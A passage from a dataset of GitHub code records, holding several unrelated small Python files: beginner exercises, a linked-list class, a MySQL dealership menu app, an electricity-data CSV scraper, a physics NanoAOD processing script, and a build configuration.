10**(l-1)\n ot = h*(l-1)*10**(l-2)\n return oh + ot\n","repo_name":"lanpartis/jianzhiOffer_practice","sub_path":"31_numberOf1Between1AndN.py","file_name":"31_numberOf1Between1AndN.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36022210742","text":"import pandas as pd\nimport numpy as np\nfrom datetime import datetime\nfrom urllib.request import Request, urlopen # Python 3\n\ndef read_kansai_csv():\n combined_data = pd.DataFrame()\n for year in range(2016, datetime.now().year + 1):\n # Bypass 403 Forbidden error\n req = Request('https://www.kansai-td.co.jp/denkiyoho/csv/area_jyukyu_jisseki_' +\n str(year) + '.csv')\n req.add_header('User-Agent', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0')\n content = urlopen(req)\n\n csv = pd.read_csv(content, header = 1, encoding = 'shift_jis')\n\n # Combine multi-year CSVs into one dataframe\n combined_data = combined_data.append(csv, ignore_index=True)\n\n # Drop NaN columns\n combined_data.drop(combined_data.iloc[:, 13:], axis=1, inplace=True)\n\n # Translate Japanese column names to English\n combined_data.columns = ['Date_Time', 'Area_Demand', 'Nuclear', 'Thermal',\n 'Hydraulic', 'Geothermal', 'Biomass', 'Solar(Actual)',\n 'Solar(Output_Control)', 'Wind(Actual)', 'Wind(Output_Control)',\n 'Pumped_Hydro', 'Interconnector']\n\n # assign units and region\n combined_data['Region'] = 'Kansai'\n combined_data['Unit'] = 'MWh'\n\n # Format the datetime\n 
combined_data['Date_Time']=pd.to_datetime(combined_data['Date_Time'], format='%Y/%m/%d %H:%M')\n\n # get demand data into one df\n demand_df = combined_data[['Date_Time', 'Region', 'Unit', 'Area_Demand']].copy()\n demand_df.sort_values(by=['Date_Time'],ascending=False, inplace=True)\n # Drop NaN rows (not sure why there are NaN rows...)\n demand_df.dropna(inplace = True)\n\n # get supply data into another df\n supply_df = combined_data\n supply_df.drop('Area_Demand', axis=1, inplace=True)\n # Pivot \"wide\" to \"long\" format\n supply_df = pd.melt(combined_data, id_vars=['Date_Time','Region', 'Unit'], var_name='Fuel_Type', value_name='Supply')\n supply_df.sort_values(by=['Date_Time','Fuel_Type'], ascending=False, inplace=True)\n # Drop NaN rows (not sure why there are NaN rows...)\n supply_df.dropna(inplace = True)\n\n return demand_df, supply_df\n\nif __name__ == '__main__':\n demand_df, supply_df = read_kansai_csv()\n# demand_df\n# supply_df\n ","repo_name":"kellyzwang/Grid-Emissions-Data-Scraper-Japan-Vietnam","sub_path":"data_scrapers/japan_kansai/japan_kansai.py","file_name":"japan_kansai.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31156073434","text":"'''\r\n#1.check whether a number is prime number or not a prime number\r\nx=int(input(\"enter the value of x:\"))\r\nfor i in range(2,x):\r\n if (x%i==0):\r\n print(x,\"is a not prime number\")\r\n break\r\nelse:\r\n print(x,\"is a prime number\")\r\n\r\n#2.check whether a number is prime number or not in a given interval\r\nx=int(input(\"enter the value of x:\"))\r\ny=int(input(\"enter the value of y:\"))\r\nu=[]\r\nv=[]\r\nfor i in range(x,y+1):\r\n if i>1:\r\n for j in range(2,i):\r\n if(i%j)==0:\r\n #print(i,\"is not a prime number\")\r\n u.append(i)\r\n\r\n break\r\n else:\r\n v.append(i)\r\n #print(i,\"is a prime number\")\r\nprint(\"List of Non Prime Numbers:\", u)\r\nprint(\"Number of Non Prime Numbers:\", len(u))\r\nprint(\"List of Prime Numbers:\", v)\r\nprint(\"Number of Non Prime Numbers:\", len(v))\r\n\r\n#3.check whether a number is Armstrong or not\r\nx=int(input(\"enter the value of x:\"))\r\nsum=0\r\nnum=x\r\nwhile x>0:\r\n di=x%10\r\n sum=sum+(di*di*di)\r\n x=x//10\r\nif sum==num:\r\n print(\"x is Armstrong number\")\r\nelse:\r\n print(\"x is not Armstrong number\")\r\n\r\n#4.check whether a number is Armstrong in a given interval\r\n\r\na=int(input(\"enter the value of x:\"))\r\nb=int(input(\"enter the value of y:\"))\r\n\r\nc=[]\r\nfor num in range(a,b+1):\r\n a=num\r\n sum=0\r\n while num>0: \r\n di=num%10\r\n sum=sum+(di*di*di)\r\n num=num//10\r\n if (sum==a):\r\n c.append(a)\r\nprint(c)\r\n\r\n#5.find sum of digits of a given number\r\nx=int(input(\"enter the value:\"))\r\n\r\nsum=0\r\nwhile x>0:\r\n di=x%10\r\n sum=sum+di\r\n x=x//10\r\nprint(sum)\r\n'''\r\n#6.product of digits\r\nx=int(input(\"enter the value:\"))\r\n\r\npro=1\r\nwhile x>0:\r\n di=x%10\r\n pro=pro*di\r\n x=x//10\r\nprint(pro)\r\n'''\r\nx=[2,-2,3,-3,8,-8,2]\r\nv=[]\r\nu=[]\r\nfor i in x:\r\n if i>=0:\r\n v.append(i)\r\n\r\n else:\r\n u.append(i)\r\n#print(v)\r\n#print(u)\r\n#z=sum(v)\r\n#print(z)\r\nz1=sum(u)\r\nc=abs(z1)\r\n#print(c)\r\nif z==c:\r\n print(\"equal\")\r\nelse:\r\n print(\"not equal\")\r\n\r\n\r\nx=int(input(\"enter the value of x:\"))\r\ny=int(input(\"enter the value of y:\"))\r\nfor i in range(x,y):\r\n if i%3==0 and i%5==0:\r\n print(i, \"fizz buzz\")\r\n #continue\r\n elif i%3==0:\r\n print(i, \"fizz\")\r\n 
#continue\r\n elif i%5==0:\r\n print(i, \"buzz\")\r\n #continue\r\n else:\r\n print(i, \"na\")\r\n\r\n\r\n\r\nx=[2,3,4,5,6,7,10,4,10,3,5,6,7,7,8,9,1,2,3,4,5]\r\nu=[]\r\nv=[]\r\nfor i in x:\r\n if i%2==0:\r\n u.append(i)\r\n else:\r\n v.append(i)\r\nprint(u)\r\nprint(v)\r\ns=sum(u)\r\nprint(s)\r\nf=sum(v)\r\nprint(f)\r\nif u==v:\r\n print(\"equal\")\r\nelse:\r\n print(\"not equal\")\r\n \r\nx=int(input(\"enter the value:\"))\r\nfact=1\r\nfor i in range(1,x+1):\r\n fact=fact*i\r\nprint(fact)\r\n\r\n \r\nx=int(input(\"enter the value:\"))\r\nfact=1\r\ni=1\r\nwhile i>fact:\r\n fact=fact*i\r\n i=i+1\r\nprint(fact)\r\n'''\r\n","repo_name":"Sathya2020/Python_Coding","sub_path":"Apr_17.py","file_name":"Apr_17.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34884429574","text":"import mysql.connector\nfrom mysql.connector import errorcode\nimport sys, os\n\ncnx = mysql.connector.connect(user='root', password ='root', \n unix_socket=('/Applications/MAMP/tmp/mysql/mysql.sock'))\n\nDB_NAME = 'dealershipDB'\n\ncursor = cnx.cursor()\n\n#Creates the database, will print error if failed\ndef create_database(cursor, DB_NAME):\n try:\n cursor.execute(\"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".format(DB_NAME))\n except mysql.connector.Error as err:\n print (\"Failed creating database: {}\".format(err))\n exit(1)\n\n#Creates the table for brands.\ndef create_table_brands(cursor):\n create_brands = \"CREATE TABLE `brands` (\" \\\n \" `name` varchar(64) NOT NULL,\" \\\n \" `country` varchar(64),\" \\\n \" `parent_co` varchar(64),\" \\\n \" `ceo` varchar(64),\" \\\n \" PRIMARY KEY (`name`)\" \\\n \") ENGINE = InnoDB\"\n \n try:\n print(\"Creating table brands: \")\n cursor.execute(create_brands)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"Already exists.\")\n else:\n print(err.msg)\n else:\n print(\"OK\")\n\n#Creates the table for cars. \ndef create_table_cars(cursor):\n create_cars = \"CREATE TABLE `cars` (\" \\\n \" `car_id` varchar(64) NOT NULL,\" \\\n \" `brand` varchar(64),\" \\\n \" `model` varchar(64),\" \\\n \" `year` SMALLINT,\" \\\n \" PRIMARY KEY (`car_id`),\" \\\n \" FOREIGN KEY (`brand`) REFERENCES brands(name)\" \\\n \") ENGINE = InnoDB\"\n \n try:\n print(\"Creating table cars: \")\n cursor.execute(create_cars)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"Already exists.\")\n else:\n print(err.msg)\n else:\n print(\"OK\")\n\n#Creates the table for listings. \ndef create_table_listings(cursor):\n create_listings = \"CREATE TABLE `listings` (\" \\\n \" `vin_nr` varchar(64) NOT NULL,\" \\\n \" `car_id` varchar(64),\" \\\n \" `color` varchar(64),\" \\\n \" `miles` INT,\" \\\n \" `price` INT,\" \\\n \" PRIMARY KEY (`vin_nr`),\" \\\n \" FOREIGN KEY (`car_id`) REFERENCES cars(car_id)\" \\\n \") ENGINE = InnoDB\"\n \n try:\n print(\"Creating table listings: \")\n cursor.execute(create_listings)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"Already exists.\")\n else:\n print(err.msg)\n else:\n print(\"OK\")\n\n#Inserts the data from the file brands.csv into the table brands. 
You will need to to change\n#the LOAD DATA INFILE 'directory' to match the directory of your 'brands.csv'.\n#furthermore if you have trouble with secure_file_priv you will need to disable this in your mysql config.\ndef insert_into_brands(cursor):\n insert_sql = \"LOAD DATA INFILE '/Users/lk8562peterdahlberg/Desktop/python_courses/1DV503/data/brands.csv' \"\\\n \"INTO TABLE brands \"\\\n \"FIELDS TERMINATED BY ';' \"\\\n \"ENCLOSED BY '\\\"' \"\\\n \"LINES TERMINATED BY '\\n' \"\\\n \"IGNORE 1 ROWS \"\\\n\n try:\n print(\"Inserting data into brands:\")\n cursor.execute(insert_sql)\n except mysql.connector.Error as err:\n print(err.msg)\n else:\n cnx.commit()\n print(\"OK\")\n\n#Inserts the data from the file cars.csv into the table cars. You will need to to change\n#the LOAD DATA INFILE 'directory' to match the directory of your 'cars.csv'.\n#furthermore if you have trouble with secure_file_priv you will need to disable this in your mysql config.\ndef insert_into_cars(cursor):\n insert_sql = \"LOAD DATA INFILE '/Users/lk8562peterdahlberg/Desktop/python_courses/1DV503/data/cars.csv' \"\\\n \"INTO TABLE cars \"\\\n \"FIELDS TERMINATED BY ';' \"\\\n \"ENCLOSED BY '\\\"' \"\\\n \"LINES TERMINATED BY '\\n' \"\\\n \"IGNORE 1 ROWS \"\\\n\n try:\n print(\"Inserting data into cars:\")\n cursor.execute(insert_sql)\n except mysql.connector.Error as err:\n print(err.msg)\n else:\n cnx.commit()\n print(\"OK\")\n\n#Inserts the data from listings.csv into the table listings. You will need to to change\n#the LOAD DATA INFILE 'directory' to match the directory of your 'listings.csv'.\n#furthermore if you have trouble with secure_file_priv you will need to disable this in your mysql config.\ndef insert_into_listings(cursor):\n insert_sql = \"LOAD DATA INFILE '/Users/lk8562peterdahlberg/Desktop/python_courses/1DV503/data/listings.csv' \"\\\n \"INTO TABLE listings \"\\\n \"FIELDS TERMINATED BY ';' \"\\\n \"ENCLOSED BY '\\\"' \"\\\n \"LINES TERMINATED BY '\\n' \"\\\n \"IGNORE 1 ROWS \"\\\n\n try:\n print(\"Inserting data into listings:\")\n cursor.execute(insert_sql)\n except mysql.connector.Error as err:\n print(err.msg)\n else:\n cnx.commit()\n print(\"OK\")\n\ntry:\n cursor.execute(\"USE {}\".format(DB_NAME)) #USE dealershipDB\nexcept mysql.connector.Error as err:\n print(\"Database {} does not exist.\".format(DB_NAME))\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor, DB_NAME)\n print(\"Database {} successfully created.\".format(DB_NAME))\n cnx.database = DB_NAME\n create_table_brands(cursor)\n create_table_cars(cursor)\n create_table_listings(cursor)\n insert_into_brands(cursor)\n insert_into_cars(cursor)\n insert_into_listings(cursor)\n else:\n print(err)\n\n#Below is the code for all of the queries depending on the option chosen from the main menu.\ndef query_1(cursor):\n query1_1 = \"CREATE VIEW listings_info AS SELECT\"\\\n \" cars.brand, cars.model, cars.year, listings.color, listings.miles, listings.price\"\\\n \" FROM listings INNER JOIN cars ON listings.car_id=cars.car_id\"\\\n\n query1_2 = \"SELECT * FROM listings_info\"\n \n #Creates the view if not already created\n try:\n cursor.execute(query1_1)\n except Exception:\n pass\n\n cursor.execute(query1_2)\n\n results = cursor.fetchall()\n for row in results:\n print(row[0], row[1], row[2], \",\", row[3], \",\", row[4], \"miles,\", row[5], \"$\")\n\n\ndef query_2(cursor, answer_color):\n query2 = \"SELECT cars.brand, cars.model, cars.year FROM cars, listings\"\\\n \" WHERE listings.car_id=cars.car_id AND listings.color=%s\"\n 
cursor.execute(query2, (answer_color,))\n results = cursor.fetchall()\n if results:\n for row in results:\n print(row[0], row[1], row[2])\n else:\n print(\"No vehicle has that color.\")\n\ndef query_3(cursor):\n query3 = \"SELECT AVG(price) FROM listings\"\n cursor.execute(query3)\n results = cursor.fetchall()\n for row in results:\n print(\"The average price of a car is:\", row[0], \"$\")\n \ndef query_4(cursor, answer_country):\n query4 = \"SELECT cars.brand, cars.model, cars.year FROM brands, cars, listings\"\\\n \" WHERE listings.car_id=cars.car_id AND cars.brand=brands.name\"\\\n \" AND brands.country =%s\"\n cursor.execute(query4, (answer_country,))\n results = cursor.fetchall()\n if results:\n for row in results:\n print(row[0], row[1], row[2])\n else:\n print(\"No cars from that country.\")\n\ndef query_5(cursor):\n query5 = \"SELECT cars.brand, COUNT(listings.vin_nr) FROM listings, cars\"\\\n \" WHERE listings.car_id=cars.car_id GROUP BY cars.brand\"\n cursor.execute(query5)\n results = cursor.fetchall()\n for row in results:\n print(row[0], \":\", row[1])\n\n\n#Main menu\ndef main_menu():\n print(\"------------------------\")\n print(\"1. Show full info on all listings.\")\n print(\"2. Search for what cars are available in a certain color.\")\n print(\"3. Show average price of a car being sold.\")\n print(\"4. Search for what cars are available from a certain brand country.\")\n print(\"5. Search for how many cars are available from each brand.\")\n print(\"Q. Quit.\")\n print(\"------------------------\")\n print(\"Please choose an option:\")\n answer = str(input())\n return answer\n\n#Function that waits for a user to press a key, this is cross platform,\n#though I have only tested it with macOS as that's what I'm using.\n#This can also be achieved with curses (though I don't know if it's cross platform).\ndef wait():\n key_press = None\n if os.name == 'nt':\n import msvcrt\n key_press = msvcrt.getch()\n else:\n import termios\n fd = sys.stdin.fileno()\n\n oldterm = termios.tcgetattr(fd)\n newattr = termios.tcgetattr(fd)\n newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO\n termios.tcsetattr(fd, termios.TCSANOW, newattr)\n\n try:\n key_press = sys.stdin.read(1)\n except IOError:\n pass\n finally:\n termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)\n return key_press\n\n\n\n#All the different options, choosing quit will simply stop the while loop.\ndef answer_1():\n query_1(cursor)\n print(\"Press any key to return to main menu:\")\n wait()\n\ndef answer_2():\n print(\"Enter the color:\")\n answer_color = input()\n query_2(cursor, answer_color)\n print(\"Press any key to return to main menu:\")\n wait()\n\ndef answer_3():\n query_3(cursor)\n print(\"Press any key to return to main menu:\")\n wait()\n\ndef answer_4():\n print(\"Enter the country:\")\n answer_country = input()\n query_4(cursor, answer_country)\n print(\"Press any key to return to main menu:\")\n wait()\n\ndef answer_5():\n query_5(cursor)\n print(\"Press any key to return to main menu:\")\n wait()\n\nwhile True:\n answer = main_menu()\n\n if answer == \"1\":\n answer_1()\n\n elif answer == \"2\":\n answer_2()\n\n elif answer == \"3\":\n answer_3()\n\n elif answer == \"4\":\n answer_4()\n\n elif answer == \"5\":\n answer_5()\n\n elif answer == \"Q\" or answer == \"q\":\n print(\"Quitting.\")\n 
break","repo_name":"pd222ha/1DV503-Programming-assignment-2","sub_path":"PA2.py","file_name":"PA2.py","file_ext":"py","file_size_in_byte":9467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39626579395","text":"class SinglyNode:\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def insert_at_head(self, d):\n x = SinglyNode(d)\n\n if self.head is None:\n self.head = x\n else:\n x.next = self.head\n self.head = x\n\n def insert_at_tail(self, d):\n tr = self.head\n while tr.next is not None:\n tr = tr.next\n tr.next = SinglyNode(d)\n\n def is_empty(self):\n return self.head is None\n\n def print_all(self):\n while self.head is not None:\n print(self.head.data)\n self.head = self.head.next\n\n def print_all(self, tr):\n while tr is not None:\n print(tr.data)\n tr = tr.next\n\n def reverse_using_recusrion(self, h):\n if h.next is None:\n return h\n r = None\n r = self.reverse_using_recusrion(h.next)\n h.next.next = h\n h.next = None\n return r\n\n def reverse_using_loop(self, h):\n prev = None\n nxt = None\n\n while h is not None:\n nxt = h.next\n h.next = prev\n prev = h\n h = nxt\n return prev\n\n def remove_without_head_brute_force(self, h):\n tr = h\n while (tr.next is not None):\n tr.data = tr.next.data\n tr = tr.next\n while (h.next != tr):\n h = h.next\n h.next = None\n\n def delete_without_head_simple(self, h):\n if h is None or h.next is None:\n return None\n x = h.next.next\n h.data = h.next.data\n h.next = x\n\n\ndef remove_loop(h):\n slow = h\n fast = h\n tr = h\n\n while fast.next is not None:\n\n fast = fast.next\n if fast is None:\n break\n fast = fast.next\n slow = slow.next\n if fast == slow:\n break\n\n while slow.next != tr.next:\n tr = tr.next\n slow = slow.next\n\n slow.next = None\n return h\n\n\n\n","repo_name":"biswarup2444/python_dsa","sub_path":"datastructures/linkedlist/singly/singly_node.py","file_name":"singly_node.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34134949923","text":"class Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n dit = {} #将列表转为字典\n nums.sort() #将列表排序\n for i in nums: #计算列表元素数量\n dit[i] = dit.get(i,0)+1\n dit = sorted(dit.items(), key=lambda dit:dit[1], reverse=True) #排序列表元素\n res = []\n for x in range(k):\n res.append(dit[x][0])\n return res\n","repo_name":"dgtyuewq/leetcode","sub_path":"解答/前 K 个高频元素.py","file_name":"前 K 个高频元素.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32354156397","text":"import os\nimport pathlib\nimport platform\n\nROOT_PATH = str(pathlib.Path(os.path.dirname(os.path.realpath(__file__))).parent)\nCURRENT_EXPERIMENT = 'bigsarima'\nRUNNING_LOCALLY = 'macOS' in platform.platform()\n\nif RUNNING_LOCALLY:\n OUTPUT_DIR = os.path.join(ROOT_PATH,'localoutput',CURRENT_EXPERIMENT,'output')\nelse:\n OUTPUT_DIR = '/cnvrg/output'\n\n\nif __name__=='__main__':\n print(platform.platform())\n print({'RUNNING_LOCALLY':RUNNING_LOCALLY,'OUTPUT_DIR':OUTPUT_DIR})\n\n\n","repo_name":"microprediction/schooled","sub_path":"schooled/whereami.py","file_name":"whereami.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"20231310937","text":"from glob import 
glob\nimport uproot3\nimport numpy as np\nimport pandas as pd\nimport tqdm\nfrom RooPandasFunctions import PNanotoDataFrame,PSequential,PColumn,PFilter,PRow,PProcessor,PProcRunner,PInitDir\nfrom collections import OrderedDict\n\n#Define Datasets and corresponding file selections\nfnames={}\n#fnames[\"QCD_HT1000to1500\"] = sorted(glob('/cms/knash/EOS/QCD_HT1000to1500_TuneCP5_PSWeights_13TeV-madgraphMLM-pythia8/RunIISummer20UL16MiniAOD-106X_mcRun2_asymptotic_v13-v1_NanoB2GNano2016mc_v1/*/*/*.root'))\n#fnames[\"QCD_HT1500to2000\"]= sorted(glob('/cms/knash/EOS/QCD_HT1500to2000_TuneCP5_PSWeights_13TeV-madgraphMLM-pythia8/RunIISummer20UL16MiniAOD-106X_mcRun2_asymptotic_v13-v1_NanoB2GNano2016mc_v1/*/*/*.root'))\n#fnames[\"QCD_HT2000toInf\"]= sorted(glob('/cms/knash/EOS/QCD_HT2000toInf_TuneCP5_PSWeights_13TeV-madgraphMLM-pythia8/RunIISummer20UL16MiniAOD-106X_mcRun2_asymptotic_v13-v1_NanoB2GNano2016mc_v1/*/*/*.root'))\n#fnames[\"TT\"] = sorted(glob('/cms/knash/EOS/ZprimeToTT_M2500_W25_TuneCP2_PSweights_13TeV-madgraph-pythiaMLM-pythia8/RunIISummer20UL16MiniAOD-106X_mcRun2_asymptotic_v13-v2_NanoB2GNano2016mc_v1/*/*/*.root'))\nfnames[\"HgHg_15001400\"]=sorted(glob('/cms/knash/EOS/SQSQtoqchiqchitoHiggs_M1500_M1400_M200/knash-RunIISummer20UL16MiniAOD-106X_mcRun2_asymptotic_v13-76761e5076679f48cfaad96c1b8156aa_NanoB2GNano2016mc_v1/*/*/*.root'))\nfnames[\"PgPg_15001400\"]=sorted(glob('/cms/knash/EOS/SQSQtoqchiqchitoPhotons_M1500_M1400_M200/knash-RunIISummer20UL16MiniAOD-106X_mcRun2_asymptotic_v13-76761e5076679f48cfaad96c1b8156aa_NanoB2GNano2016mc_v1/*/*/*.root'))\nfnames[\"PgPg_1500400\"]=sorted(glob('/cms/knash/EOS/SQSQtoqchiqchitoPhotons_M1500_M400_M200/knash-RunIISummer20UL16MiniAOD-106X_mcRun2_asymptotic_v13-76761e5076679f48cfaad96c1b8156aa_NanoB2GNano2016mc_v1/*/*/*.root'))\nfnames[\"WgWg_15001400\"]=sorted(glob('/cms/knash/EOS/SQSQtoqchiqchitoWs_M1500_M1400_M200/knash-RunIISummer20UL16MiniAOD-106X_mcRun2_asymptotic_v13-76761e5076679f48cfaad96c1b8156aa_NanoB2GNano2016mc_v1/*/*/*.root'))\nfnames[\"WgWg_1500400\"]=sorted(glob('/cms/knash/EOS/SQSQtoqchiqchitoWs_M1500_M400_M200/knash-RunIISummer20UL16MiniAOD-106X_mcRun2_asymptotic_v13-76761e5076679f48cfaad96c1b8156aa_NanoB2GNano2016mc_v1/*/*/*.root'))\n\n\n\n#Do this if accessing over XROOTD\nfileset={}\nfor ffi in fnames:\n #fileset[ffi]=[ffj.replace(\"/eos/uscms/\",\"root://cmsxrootd.fnal.gov///\") for ffj in fnames[ffi]]\n fileset[ffi]=fnames[ffi]\n #fileset[ffi]=fileset[ffi][:10]\n\n#This is the Nano->Parquet file reduction factor\nbatchesperfile={\n \"TT\":3,\n \"HgHg_15001400\":2,\n \"PgPg_15001400\":2,\n \"PgPg_1500400\":2,\n \"WgWg_15001400\":2,\n \"WgWg_1500400\":2,\n \"QCD_HT1500to2000\":5,\n \"QCD_HT1000to1500\":5,\n \"QCD_HT2000toInf\":5}\n\n#Keep only the branches you want \"Jet\",[\"pt\"] would be the branch Jet_pt in the 
NanoAOD\nbranchestokeep=OrderedDict([(\"FatJet\",[\"pt\",\"eta\",\"phi\",\"mass\",\"msoftdrop\",\"iAEMSE\",\"iAEL0\",\"iAEL1\",\"iAEL2\",\"iAEL3\",\"iAEL4\",\"iAEL5\"]),(\"\",[\"run\",\"luminosityBlock\",\"event\"])])\n#branchestokeep=OrderedDict([(\"LHEPart\",[\"pt\",\"eta\",\"phi\",\"mass\",\"pdgId\",\"status\"]),(\"FatJet\",[\"pt\",\"eta\",\"phi\",\"mass\",\"hadronFlavour\",\"partonFlavour\",\"msoftdrop\",\"iAEMSE\",\"iAEL0\",\"iAEL1\",\"iAEL2\",\"iAEL3\",\"iAEL4\",\"iAEL5\"]),(\"\",[\"run\",\"luminosityBlock\",\"event\"])])\n#branchestokeep=OrderedDict([(\"Muon\",[\"pt\",\"eta\",\"phi\",\"mass\"]),(\"Jet\",[\"pt\",\"eta\",\"phi\",\"mass\"]),(\"FatJet\",[\"pt\",\"eta\",\"phi\",\"mass\",\"hadronFlavour\",\"partonFlavour\",\"msoftdrop\",\"iAEMSE\",\"iAEL0\",\"iAEL1\",\"iAEL2\",\"iAEL3\",\"iAEL4\",\"iAEL5\"]),(\"\",[\"run\",\"luminosityBlock\",\"event\"])])\n\n\n\n\n#Trim out element indices you dont want (ie only keep top 5 jets etc)\nmind={\"FatJet\":5,\"FatJet\":5,\"\":None}\n\n\n#It is possible to pass a column selection here similar to the analyzer. \n#Clearly the syntax is overly complicated compared to the analyzer -- to improve. \n#This is useful for skimming and calculating a value from collections that you dont want to save.\n#ex/calculate ht from ak4 jets, then drop ak4s:\nclass ColumnSelection():\n def __call__(self,df,EventInfo):\n\n htdf=pd.DataFrame()\n htdf[\"ht\"]=df[\"Jet_pt\"].groupby(level=0).sum()\n htdf['subentry'] = 0\n htdf.set_index('subentry', append=True, inplace=True)\n df=pd.concat((df,htdf),axis=1)\n\n df=df.drop([\"Jet_pt\",\"Jet_eta\",\"Jet_phi\",\"Jet_mass\"],axis=1)\n\n return df\n \nskim= [\n PColumn(ColumnSelection()),\n ]\n\n#Run it. nproc is the number of processors. >1 goes into multiprocessing model\n#PNanotoDataFrame(fileset,branchestokeep,filesperchunk=batchesperfile,nproc=1,atype=\"flat\",dirname=\"RooFlatFull\",maxind=mind,seq=skim).Run()\nPNanotoDataFrame(fileset,branchestokeep,filesperchunk=batchesperfile,nproc=2,atype=\"flat\",dirname=\"RooFlatFull\",maxind=mind).Run()\n\n\n\n\n\n\n","repo_name":"knash/AEAnalyzer","sub_path":"RooPandasAnomalyProcessor.py","file_name":"RooPandasAnomalyProcessor.py","file_ext":"py","file_size_in_byte":4856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73479729424","text":"AR = ['/usr/bin/ar']\nARFLAGS = ['rcs']\nBINDIR = '/usr/local/bin'\nCC = ['/usr/bin/gcc']\nCCLNK_SRC_F = []\nCCLNK_TGT_F = ['-o']\nCC_NAME = 'gcc'\nCC_SRC_F = []\nCC_TGT_F = ['-c', '-o']\nCC_VERSION = ('4', '8', '2')\nCFLAGS_MACBUNDLE = ['-fPIC']\nCFLAGS_PYEMBED = ['-fstack-protector', '-fwrapv']\nCFLAGS_PYEXT = ['-fstack-protector', '-fwrapv']\nCFLAGS_SOY = ['-pthread', '-pthread']\nCFLAGS_cshlib = ['-fPIC']\nCOMPILER_CC = 'gcc'\nCPPPATH_ST = '-I%s'\nCXXFLAGS_PYEMBED = ['-fstack-protector', '-fwrapv']\nCXXFLAGS_PYEXT = ['-fstack-protector', '-fwrapv']\nCXXFLAGS_SOY = ['-pthread', '-pthread']\nDEFINES = ['PYTHONDIR=\"/usr/lib/python3/dist-packages\"', 'PYTHONARCHDIR=\"/usr/lib/python3/dist-packages\"', 'HAVE_PYEMBED=1', 'HAVE_PYEXT=1', 'HAVE_PYTHON_H=1']\nDEFINES_PYEMBED = ['HAVE_PYEMBED=1', 'NDEBUG']\nDEFINES_PYEXT = ['HAVE_PYEXT=1', 'NDEBUG']\nDEFINES_SOY = ['HAVE_SOY=1']\nDEFINES_ST = '-D%s'\nDEST_BINFMT = 'elf'\nDEST_CPU = 'x86_64'\nDEST_OS = 'linux'\nHAVE_PYEMBED = 1\nHAVE_PYEXT = 1\nHAVE_SOY = 1\nINCLUDES_PYEMBED = ['/usr/include/python3.4m']\nINCLUDES_PYEXT = ['/usr/include/python3.4m']\nINCLUDES_SOY = ['/usr/local/include', '/usr/include/glib-2.0', 
'/usr/lib/x86_64-linux-gnu/glib-2.0/include', '/usr/include/gee-0.8', '/usr/include/dbus-1.0', '/usr/include/librsvg-2.0', '/usr/include/nice', '/usr/lib/x86_64-linux-gnu/dbus-1.0/include', '/usr/include/gdk-pixbuf-2.0', '/usr/include/cairo', '/usr/include/libpng12', '/usr/include/pixman-1', '/usr/include/freetype2', '/usr/include/loudmouth-1.0']\nLIBDIR = '/usr/local/lib'\nLIBPATH_PYEMBED = ['/usr/lib/python3.4/config-3.4m-x86_64-linux-gnu', '/usr/lib']\nLIBPATH_PYEXT = ['/usr/lib/python3.4/config-3.4m-x86_64-linux-gnu', '/usr/lib']\nLIBPATH_SOY = ['/usr/local/lib']\nLIBPATH_ST = '-L%s'\nLIB_PYEMBED = ['pthread', 'dl', 'util', 'm', 'python3.4m']\nLIB_PYEXT = ['pthread', 'dl', 'util', 'm', 'python3.4m']\nLIB_SOY = ['soy', 'gee-0.8', 'dbus-glib-1', 'rsvg-2', 'm', 'loudmouth-1', 'idn', 'nice', 'gthread-2.0', 'GLESv2', 'dbus-1', 'gio-2.0', 'gdk_pixbuf-2.0', 'cairo', 'gobject-2.0', 'glib-2.0']\nLIB_ST = '-l%s'\nLINKFLAGS_MACBUNDLE = ['-bundle', '-undefined', 'dynamic_lookup']\nLINKFLAGS_PYEMBED = ['-Xlinker', '-export-dynamic', '-Wl,-O1', '-Wl,-Bsymbolic-functions']\nLINKFLAGS_PYEXT = ['-Xlinker', '-export-dynamic', '-Wl,-O1', '-Wl,-Bsymbolic-functions']\nLINKFLAGS_SOY = ['-pthread', '-Wl,-export-dynamic', '-pthread']\nLINKFLAGS_cshlib = ['-shared']\nLINKFLAGS_cstlib = ['-Wl,-Bstatic']\nLINK_CC = ['/usr/bin/gcc']\nLINUX = 1\nPACKAGE = 'pysoy'\nPKGCONFIG = ['/usr/bin/pkg-config']\nPREFIX = '/usr'\nPYC = 1\nPYFLAGS = ''\nPYFLAGS_OPT = '-O'\nPYO = 1\nPYTAG = 'cpython-34'\nPYTHON = ['/usr/bin/python3']\nPYTHONARCHDIR = '/usr/lib/python3/dist-packages'\nPYTHONDIR = '/usr/lib/python3/dist-packages'\nPYTHON_CONFIG = ['/usr/bin/python3-config']\nPYTHON_VERSION = '3.4'\nRPATH_ST = '-Wl,-rpath,%s'\nSHLIB_MARKER = '-Wl,-Bdynamic'\nSONAME_ST = 